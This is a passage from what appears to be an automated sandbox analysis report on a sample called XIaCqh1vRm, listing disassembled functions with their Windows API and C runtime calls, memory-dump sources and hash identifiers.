                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 024A24C4
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 024A24D2
                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,024A670B), ref: 024A2500
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 024A2507
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,024A670B), ref: 024A2522
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,024A670B), ref: 024A252E
                                                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A2544
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 024A2552
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                                                          • String ID: kernel32.dll
                                                                                                                                                                                                                                                                          • API String ID: 4179531150-1793498882
                                                                                                                                                                                                                                                                          • Opcode ID: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
                                                                                                                                                                                                                                                                          • Instruction ID: fb198a6187ad5218e4a28ca95cd2a7646b6af406393cbf0691321f886d3eb6d4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5611E5799003117FE711BB756C79A6B3BECAE15B12720052BFC02E3291EBB8D5009A6C
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424866
                                                                                                                                                                                                                                                                            • Part of subcall function 00424B35: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00424599), ref: 00424B45
                                                                                                                                                                                                                                                                          • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042487B
                                                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042488A
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00424898
                                                                                                                                                                                                                                                                          • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042490E
                                                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042494E
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0042495C
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                                                                                                                                                                                                                          • String ID: pContext$switchState
                                                                                                                                                                                                                                                                          • API String ID: 3151764488-2660820399
                                                                                                                                                                                                                                                                          • Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                                                                                                                                                                                          • Instruction ID: 2510875a34d85c59997f50971944281e03e0fb8bb22fa9aac23d9a99742e70f3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F31F635B00224ABCF04EF65D881A6EB7B9FF84314F61456BE815A7381DB78EE05C798
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419768
                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419772
                                                                                                                                                                                                                                                                          • DuplicateHandle.KERNEL32(00000000), ref: 00419779
                                                                                                                                                                                                                                                                          • SafeRWList.LIBCONCRT ref: 00419798
                                                                                                                                                                                                                                                                            • Part of subcall function 00417767: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417778
                                                                                                                                                                                                                                                                            • Part of subcall function 00417767: List.LIBCMT ref: 00417782
                                                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197AA
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004197B9
                                                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197CF
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 004197DD
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                          • String ID: eventObject
                                                                                                                                                                                                                                                                          • API String ID: 1999291547-1680012138
                                                                                                                                                                                                                                                                          • Opcode ID: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
                                                                                                                                                                                                                                                                          • Instruction ID: 481122be4c91591a449bb5dcd4d0178f9edd258f0a599c8a0e64e7baae7edbbd
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A11A075500104EACB14EFA5CC49FEF77B8AF00701F24022BF519E21D1EB789A84C66D
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 024B0C36
                                                                                                                                                                                                                                                                          • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 024B0C9D
                                                                                                                                                                                                                                                                          • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 024B0CBA
                                                                                                                                                                                                                                                                          • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 024B0D20
                                                                                                                                                                                                                                                                          • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 024B0D35
                                                                                                                                                                                                                                                                          • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 024B0D47
                                                                                                                                                                                                                                                                          • Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 024B0D75
                                                                                                                                                                                                                                                                          • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 024B0D80
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 024B0DAC
                                                                                                                                                                                                                                                                          • Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 024B0DBC
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3720063390-0
                                                                                                                                                                                                                                                                          • Opcode ID: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
                                                                                                                                                                                                                                                                          • Instruction ID: 786d573ca87ffe611f688709f5500a60eecc739d42592a39fd8531b607247f3d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6741B330A042449BCF1AFFA5C4A47EE7BA6AF15305F0450AFD8095B3C2DB659A0ACF71
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00431DFA
                                                                                                                                                                                                                                                                            • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                                                            • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00431E06
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00431E11
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00431E1C
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00431E27
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00431E32
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00431E3D
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00431E48
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00431E53
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00431E61
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                                          • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                                                          • Instruction ID: 861173ad91a1010c78510ab484a24ed9c78665ad215b99cbbf48ba7f2ea438f1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5811B9B6600508BFDB02EF5AC852CD93BA5EF18755F0190AAF9084F232D635DF559F84
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024C2061
                                                                                                                                                                                                                                                                            • Part of subcall function 024C36D1: HeapFree.KERNEL32(00000000,00000000,?,024CA35F,?,00000000,?,00000000,?,024CA603,?,00000007,?,?,024CA9F7,?), ref: 024C36E7
                                                                                                                                                                                                                                                                            • Part of subcall function 024C36D1: GetLastError.KERNEL32(?,?,024CA35F,?,00000000,?,00000000,?,024CA603,?,00000007,?,?,024CA9F7,?,?), ref: 024C36F9
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024C206D
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024C2078
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024C2083
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024C208E
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024C2099
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024C20A4
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024C20AF
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024C20BA
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024C20C8
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                                          • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                                                          • Instruction ID: 0f68bc051604a93f9ce8e542ecc60d661016fa722728ebdc5245b7f71ea2c3c4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09114779710108AFCB91FF5AC941DD93FA6EF04750B6181AABA094F261D771EE609F80
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: __cftoe
• String ID: F(@$F(@
• API String ID: 4189289331-2038261262
• Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
• Instruction ID: f7128e803ecc638eadc91937d15ccb8599414b14ec088efe1e3a9152a03639fe
• Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
• Instruction Fuzzy Hash: 35511A32600215EBEB209F5BAC41FAF77A9EF49324F94425FF81592282DB39D900866D

APIs
• DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044018F), ref: 0043EEC5
Strings
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: DecodePointer
• String ID: acos$asin$exp$log$log10$pow$sqrt
• API String ID: 3527080286-3064271455
• Opcode ID: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
• Instruction ID: 8170d9845b751ca2959588a2f937d780391b5e174033125a046a2bd7c9c475e6
• Opcode Fuzzy Hash: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
• Instruction Fuzzy Hash: 3351AF7090050EDBDF14DF99E6481ADBBB0FB4D300F2551A7E480A7295C77A8D29CB1E

Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
• Instruction ID: c01345a6aba6f99cc68671fc9a445fcd6e03ffdfd8eb45b103531f9227e7a0b5
• Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
• Instruction Fuzzy Hash: 54C1E278E04245ABCB52DFADC840BEEBFB5AF09304F6481DEE814AB391C7709941CB65

APIs
• _ValidateLocalCookies.LIBCMT ref: 004286FB
• ___except_validate_context_record.LIBVCRUNTIME ref: 00428703
• _ValidateLocalCookies.LIBCMT ref: 00428791
• __IsNonwritableInCurrentImage.LIBCMT ref: 004287BC
• _ValidateLocalCookies.LIBCMT ref: 00428811
Strings
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: fB$csm
• API String ID: 1170836740-1586063737
• Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
• Instruction ID: 7444ce20eee9e01817f939fbe5b18052b9a848ec9e24e3aae95877e68e098c30
• Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
• Instruction Fuzzy Hash: F241FB34F012289BCF10DF19DC41A9EBBB5AF84318F64816FE9145B392DB399D11CB99

APIs
• FindSITargetTypeInstance.LIBVCRUNTIME ref: 00428D10
• FindMITargetTypeInstance.LIBVCRUNTIME ref: 00428D29
• FindVITargetTypeInstance.LIBVCRUNTIME ref: 00428D30
• PMDtoOffset.LIBCMT ref: 00428D4F
Strings
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: FindInstanceTargetType$Offset
• String ID: Bad dynamic_cast!
• API String ID: 1467055271-2956939130
• Opcode ID: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
• Instruction ID: 5e24beb8d8256b5c5f325d4796605ad5260749f939022e6450d69b98b3545f73
• Opcode Fuzzy Hash: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
• Instruction Fuzzy Hash: CD2137727062259FCB04DF65F902A6E77A4EF64714B60421FF900932C1DF3CE80586A9

APIs
• atomic_compare_exchange.LIBCONCRT ref: 024AC6DC
• atomic_compare_exchange.LIBCONCRT ref: 024AC700
• std::_Cnd_initX.LIBCPMT ref: 024AC711
• std::_Cnd_initX.LIBCPMT ref: 024AC71F
  • Part of subcall function 02491370: __Mtx_unlock.LIBCPMT ref: 02491377
• std::_Cnd_initX.LIBCPMT ref: 024AC72F
  • Part of subcall function 024AC3EF: __Cnd_broadcast.LIBCPMT ref: 024AC3F6
• Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 024AC73D
Strings
Memory Dump Source
• Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
Yara matches
Similarity
• API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
• String ID: t#D
• API String ID: 4258476935-1671555958
• Opcode ID: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
• Instruction ID: a540ffa58f75eb57f18687293ca5bbf1f46a396b577690c6308ad402697d5fd8
• Opcode Fuzzy Hash: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
• Instruction Fuzzy Hash: 0C01F775900605A7DF11B762CD95B9EB76ABF10310F14001BE80997780DBB4AA158FD2

APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D938,0042D938,?,?,?,00432385,00000001,00000001,23E85006), ref: 0043218E
• __alloca_probe_16.LIBCMT ref: 004321C6
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432385,00000001,00000001,23E85006,?,?,?), ref: 00432214
• __alloca_probe_16.LIBCMT ref: 004322AB
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043230E
• __freea.LIBCMT ref: 0043231B
  • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
• __freea.LIBCMT ref: 00432324
• __freea.LIBCMT ref: 00432349
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
Similarity
• API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
• String ID:
• API String ID: 3864826663-0
                                                                                                                                                                                                                                                                          • Opcode ID: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
                                                                                                                                                                                                                                                                          • Instruction ID: 93f6329b7fe105f45c70b5aed5e0df07748c8d3fe3b6be6f44c821e7de56536e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5851F472610216AFDB258F71CE41EAF77A9EB48B54F14522AFD04D7280DBBCDC40C698
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 024C2141: GetLastError.KERNEL32(?,?,024BA9EC,?,00000000,?,024BCDE6,0249247E,00000000,?,00451F20), ref: 024C2145
                                                                                                                                                                                                                                                                            • Part of subcall function 024C2141: _free.LIBCMT ref: 024C2178
                                                                                                                                                                                                                                                                            • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21B9
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024C1444
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024C145D
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024C148F
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024C1498
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024C14A4
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free$ErrorLast
                                                                                                                                                                                                                                                                          • String ID: C
                                                                                                                                                                                                                                                                          • API String ID: 3291180501-1037565863
                                                                                                                                                                                                                                                                          • Opcode ID: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                                                                                                                                                                                                                                          • Instruction ID: 0174e17bd8256397e2bb95e95aa0b9571352f9f89f873a19963941fa4aa1829d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14B12679A012199BDB65DF18C884BAEB7B5FB48304F2085AED84DA7351D770AE90CF80
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                                                                                                                          • Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                                                                                                                                                                                                                                          • Instruction ID: bfd9ead29151d2877f631d1061df4e601ee651aa38b3335c59b440bd117a4214
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9361F171900205AFDB20DF69C842B9EBBF4EB08710F14516BE884EB382E7399D41CB59
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                                                                                                                          • Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                                                                                                                                                                                                                                          • Instruction ID: 5951c86e5e6e204d0ee8af657f033095aff449d5c3a18a4a25b5e6a03ac25a25
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB61E179A00229AFDBA0DF6DC841B9ABBF5EB44710F3441AFE844EB345D771A941CB90
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetConsoleCP.KERNEL32(?,0042C23D,E0830C40,?,?,?,?,?,?,00433FF8,0040DDD5,0042C23D,?,0042C23D,0042C23D,0040DDD5), ref: 004338C5
                                                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 00433940
                                                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 0043395B
                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,0042C23D,00000001,?,00000005,00000000,00000000), ref: 00433981
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339A0
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,0040DDD5,00000001,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339D9
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                          • Opcode ID: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
                                                                                                                                                                                                                                                                          • Instruction ID: 0964c92a74c3400c6cb4ab9b4b67413798647f05f85f7adc4f4dadb846cf7038
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3451C271E00209AFDB10DFA8D885BEEBBF4EF09301F14412BE556E7291E7749A41CB69
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetConsoleCP.KERNEL32(?,024BC4A4,E0830C40,?,?,?,?,?,?,024C425F,0249E03C,024BC4A4,?,024BC4A4,024BC4A4,0249E03C), ref: 024C3B2C
                                                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 024C3BA7
                                                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 024C3BC2
